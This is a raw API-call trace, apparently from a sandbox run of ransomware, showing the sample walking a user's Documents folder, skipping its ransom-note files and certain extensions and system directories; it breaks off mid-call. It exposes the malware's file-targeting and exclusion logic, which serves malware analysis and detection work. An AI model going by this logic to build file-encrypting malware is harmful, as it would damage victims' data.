lstrcmpW (lpString1="f41TDB3cCDdGN.docx", lpString2=".") returned 1 [0105.032] lstrcmpW (lpString1="f41TDB3cCDdGN.docx", lpString2="..") returned 1 [0105.032] lstrcmpiW (lpString1="f41TDB3cCDdGN.docx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.032] lstrcmpiW (lpString1="f41TDB3cCDdGN.docx", lpString2="Decryptor_Info.hta") returned 1 [0105.032] PathFindExtensionW (pszPath="f41TDB3cCDdGN.docx") returned=".docx" [0105.032] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.032] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.032] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.032] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.032] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0105.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e368 [0105.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.032] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf935540, ftCreationTime.dwHighDateTime=0x1d5e11e, ftLastAccessTime.dwLowDateTime=0xb3030e20, ftLastAccessTime.dwHighDateTime=0x1d5db31, ftLastWriteTime.dwLowDateTime=0xb3030e20, ftLastWriteTime.dwHighDateTime=0x1d5db31, nFileSizeHigh=0x0, nFileSizeLow=0x10eef, dwReserved0=0x0, dwReserved1=0x0, cFileName="FFPbqnA-hPuQPBrPE4c.odp", cAlternateFileName="FFPBQN~1.ODP")) returned 1 [0105.032] lstrcmpW (lpString1="FFPbqnA-hPuQPBrPE4c.odp", lpString2=".") returned 1 [0105.032] lstrcmpW (lpString1="FFPbqnA-hPuQPBrPE4c.odp", lpString2="..") returned 1 [0105.032] lstrcmpiW (lpString1="FFPbqnA-hPuQPBrPE4c.odp", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.033] lstrcmpiW (lpString1="FFPbqnA-hPuQPBrPE4c.odp", lpString2="Decryptor_Info.hta") returned 1 [0105.033] PathFindExtensionW (pszPath="FFPbqnA-hPuQPBrPE4c.odp") returned=".odp" [0105.033] lstrcmpiW (lpString1=".odp", lpString2=".exe") returned 1 [0105.033] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0105.033] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0105.033] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0105.033] lstrcmpiW (lpString1=".odp", lpString2=".msi") returned 1 [0105.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e3f0 [0105.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.033] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f0eb70, ftCreationTime.dwHighDateTime=0x1d57a1e, ftLastAccessTime.dwLowDateTime=0x5c770680, ftLastAccessTime.dwHighDateTime=0x1d588ff, ftLastWriteTime.dwLowDateTime=0x5c770680, ftLastWriteTime.dwHighDateTime=0x1d588ff, nFileSizeHigh=0x0, nFileSizeLow=0x73f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6NYZGIEzY8oBlMt.pptx", cAlternateFileName="I6NYZG~1.PPT")) returned 1 [0105.033] lstrcmpW (lpString1="i6NYZGIEzY8oBlMt.pptx", lpString2=".") returned 1 [0105.033] lstrcmpW (lpString1="i6NYZGIEzY8oBlMt.pptx", lpString2="..") returned 1 [0105.033] lstrcmpiW (lpString1="i6NYZGIEzY8oBlMt.pptx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.033] lstrcmpiW (lpString1="i6NYZGIEzY8oBlMt.pptx", lpString2="Decryptor_Info.hta") returned 1 [0105.033] PathFindExtensionW (pszPath="i6NYZGIEzY8oBlMt.pptx") returned=".pptx" [0105.033] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0105.033] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0105.033] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0105.033] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0105.033] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0105.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e478 [0105.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.034] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38b285c0, ftCreationTime.dwHighDateTime=0x1d59fad, ftLastAccessTime.dwLowDateTime=0xada9f860, ftLastAccessTime.dwHighDateTime=0x1d5bc2f, ftLastWriteTime.dwLowDateTime=0xada9f860, ftLastWriteTime.dwHighDateTime=0x1d5bc2f, nFileSizeHigh=0x0, nFileSizeLow=0x13aaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="JEiqR VtRuOS5n.pptx", cAlternateFileName="JEIQRV~1.PPT")) returned 1 [0105.034] lstrcmpW (lpString1="JEiqR VtRuOS5n.pptx", lpString2=".") returned 1 [0105.034] lstrcmpW (lpString1="JEiqR VtRuOS5n.pptx", lpString2="..") returned 1 [0105.034] lstrcmpiW (lpString1="JEiqR VtRuOS5n.pptx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.034] lstrcmpiW (lpString1="JEiqR VtRuOS5n.pptx", lpString2="Decryptor_Info.hta") returned 1 [0105.034] PathFindExtensionW (pszPath="JEiqR VtRuOS5n.pptx") returned=".pptx" [0105.034] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0105.034] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0105.034] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0105.034] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0105.034] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0105.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e500 [0105.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.034] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa09726e0, ftCreationTime.dwHighDateTime=0x1d5b4ad, ftLastAccessTime.dwLowDateTime=0xb4f2f8a0, ftLastAccessTime.dwHighDateTime=0x1d5a82b, ftLastWriteTime.dwLowDateTime=0xb4f2f8a0, ftLastWriteTime.dwHighDateTime=0x1d5a82b, nFileSizeHigh=0x0, nFileSizeLow=0x17ec9, dwReserved0=0x0, dwReserved1=0x0, cFileName="KEGoi X095C.xlsx", cAlternateFileName="KEGOIX~1.XLS")) returned 1 [0105.034] lstrcmpW (lpString1="KEGoi X095C.xlsx", lpString2=".") returned 1 [0105.034] lstrcmpW (lpString1="KEGoi X095C.xlsx", lpString2="..") returned 1 [0105.034] lstrcmpiW (lpString1="KEGoi X095C.xlsx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.034] lstrcmpiW (lpString1="KEGoi X095C.xlsx", lpString2="Decryptor_Info.hta") returned 1 [0105.034] PathFindExtensionW (pszPath="KEGoi X095C.xlsx") returned=".xlsx" [0105.034] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0105.034] lstrcmpiW (lpString1=".xlsx", lpString2=".sys") returned 1 [0105.034] lstrcmpiW (lpString1=".xlsx", lpString2=".lnk") returned 1 [0105.035] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0105.035] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0105.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.035] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e588 [0105.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.035] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb09f60, ftCreationTime.dwHighDateTime=0x1d5e80e, ftLastAccessTime.dwLowDateTime=0x52131470, ftLastAccessTime.dwHighDateTime=0x1d5de5b, ftLastWriteTime.dwLowDateTime=0x52131470, ftLastWriteTime.dwHighDateTime=0x1d5de5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KjWgNXSB5P", cAlternateFileName="KJWGNX~1")) returned 1 [0105.035] lstrcmpW (lpString1="KjWgNXSB5P", lpString2=".") returned 1 [0105.035] lstrcmpW (lpString1="KjWgNXSB5P", lpString2="..") returned 1 [0105.035] lstrlenW (lpString="KjWgNXSB5P") returned 10 [0105.035] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="KjWgNXSB5P" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P" [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Windows") returned -1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\ProgramData") returned 1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Intel") returned 1 [0105.035] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\msys32") returned 1 [0105.036] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Qt") returned 1 [0105.036] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\ProgramData") returned 1 [0105.036] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Program Files") returned 1 [0105.036] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Windows") returned -1 [0105.036] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="C:\\Program Files (x86)") returned 1 [0105.036] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\" [0105.036] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\") returned 51 [0105.036] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77e0d0 [0105.036] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.036] FindNextFileW (in: hFindFile=0x77e0d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb09f60, ftCreationTime.dwHighDateTime=0x1d5e80e, ftLastAccessTime.dwLowDateTime=0x52131470, ftLastAccessTime.dwHighDateTime=0x1d5de5b, ftLastWriteTime.dwLowDateTime=0x52131470, ftLastWriteTime.dwHighDateTime=0x1d5de5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.037] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.037] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.037] FindNextFileW (in: hFindFile=0x77e0d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb802e350, ftCreationTime.dwHighDateTime=0x1d5dcc6, ftLastAccessTime.dwLowDateTime=0x5beb1f00, ftLastAccessTime.dwHighDateTime=0x1d5de16, ftLastWriteTime.dwLowDateTime=0x5beb1f00, ftLastWriteTime.dwHighDateTime=0x1d5de16, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E T-VRRSTs", cAlternateFileName="ET-VRR~1")) returned 1 [0105.038] lstrcmpW (lpString1="E T-VRRSTs", lpString2=".") returned 1 [0105.038] lstrcmpW (lpString1="E T-VRRSTs", lpString2="..") returned 1 [0105.038] lstrlenW (lpString="E T-VRRSTs") returned 10 [0105.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\", lpString2="E T-VRRSTs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs" [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Windows") returned -1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\ProgramData") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Intel") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\msys32") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Qt") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\ProgramData") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Program Files") returned 1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Windows") returned -1 [0105.038] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="C:\\Program Files (x86)") returned 1 [0105.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\" [0105.038] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\") returned 62 [0105.039] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\E T-VRRSTs\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77e110 [0105.039] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.039] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb802e350, ftCreationTime.dwHighDateTime=0x1d5dcc6, ftLastAccessTime.dwLowDateTime=0x5beb1f00, ftLastAccessTime.dwHighDateTime=0x1d5de16, ftLastWriteTime.dwLowDateTime=0x5beb1f00, ftLastWriteTime.dwHighDateTime=0x1d5de16, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.040] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.040] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.040] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed21b010, ftCreationTime.dwHighDateTime=0x1d5ddfd, ftLastAccessTime.dwLowDateTime=0x31c3e920, ftLastAccessTime.dwHighDateTime=0x1d5e396, ftLastWriteTime.dwLowDateTime=0x31c3e920, ftLastWriteTime.dwHighDateTime=0x1d5e396, nFileSizeHigh=0x0, nFileSizeLow=0x164c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eIUOp8l g.doc", cAlternateFileName="EIUOP8~1.DOC")) returned 1 [0105.040] lstrcmpW (lpString1="eIUOp8l g.doc", lpString2=".") returned 1 [0105.040] lstrcmpW (lpString1="eIUOp8l g.doc", lpString2="..") returned 1 [0105.040] lstrcmpiW (lpString1="eIUOp8l g.doc", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.040] lstrcmpiW (lpString1="eIUOp8l g.doc", lpString2="Decryptor_Info.hta") returned 1 [0105.040] PathFindExtensionW (pszPath="eIUOp8l g.doc") returned=".doc" [0105.040] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0105.040] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0105.040] lstrcmpiW (lpString1=".doc", lpString2=".lnk") returned -1 [0105.040] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0105.040] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0105.040] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e610 [0105.040] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77e698 [0105.040] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.040] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77e760 [0105.040] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e698 | out: hHeap=0x6d0000) returned 1 [0105.040] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe573c6b0, ftCreationTime.dwHighDateTime=0x1d5e19e, ftLastAccessTime.dwLowDateTime=0xed9fc70, ftLastAccessTime.dwHighDateTime=0x1d5e3f4, ftLastWriteTime.dwLowDateTime=0xed9fc70, ftLastWriteTime.dwHighDateTime=0x1d5e3f4, nFileSizeHigh=0x0, nFileSizeLow=0x29be, dwReserved0=0x0, dwReserved1=0x0, cFileName="J1KsjGDILiAYXKKh11.ods", cAlternateFileName="J1KSJG~1.ODS")) returned 1 [0105.041] lstrcmpW (lpString1="J1KsjGDILiAYXKKh11.ods", lpString2=".") returned 1 [0105.041] lstrcmpW (lpString1="J1KsjGDILiAYXKKh11.ods", lpString2="..") returned 1 [0105.041] lstrcmpiW (lpString1="J1KsjGDILiAYXKKh11.ods", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.041] lstrcmpiW (lpString1="J1KsjGDILiAYXKKh11.ods", lpString2="Decryptor_Info.hta") returned 1 [0105.041] PathFindExtensionW (pszPath="J1KsjGDILiAYXKKh11.ods") returned=".ods" [0105.041] lstrcmpiW (lpString1=".ods", lpString2=".exe") returned 1 [0105.041] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0105.041] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0105.041] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0105.041] lstrcmpiW (lpString1=".ods", lpString2=".msi") returned 1 [0105.041] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e808 [0105.041] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77e610 [0105.041] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e808 | out: hHeap=0x6d0000) returned 1 [0105.041] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9700 [0105.041] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.041] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77eb8370, ftCreationTime.dwHighDateTime=0x1d5e52d, ftLastAccessTime.dwLowDateTime=0x5960a770, ftLastAccessTime.dwHighDateTime=0x1d5da90, ftLastWriteTime.dwLowDateTime=0x5960a770, ftLastWriteTime.dwHighDateTime=0x1d5da90, nFileSizeHigh=0x0, nFileSizeLow=0x9af8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PIzt6Y.doc", cAlternateFileName="")) returned 1 [0105.041] lstrcmpW (lpString1="PIzt6Y.doc", lpString2=".") returned 1 [0105.041] lstrcmpW (lpString1="PIzt6Y.doc", lpString2="..") returned 1 [0105.041] lstrcmpiW (lpString1="PIzt6Y.doc", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.041] lstrcmpiW (lpString1="PIzt6Y.doc", lpString2="Decryptor_Info.hta") returned 1 [0105.041] PathFindExtensionW (pszPath="PIzt6Y.doc") returned=".doc" [0105.041] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0105.041] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0105.041] lstrcmpiW (lpString1=".doc", lpString2=".lnk") returned -1 [0105.041] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0105.041] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0105.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e808 [0105.042] RtlAllocateHeap 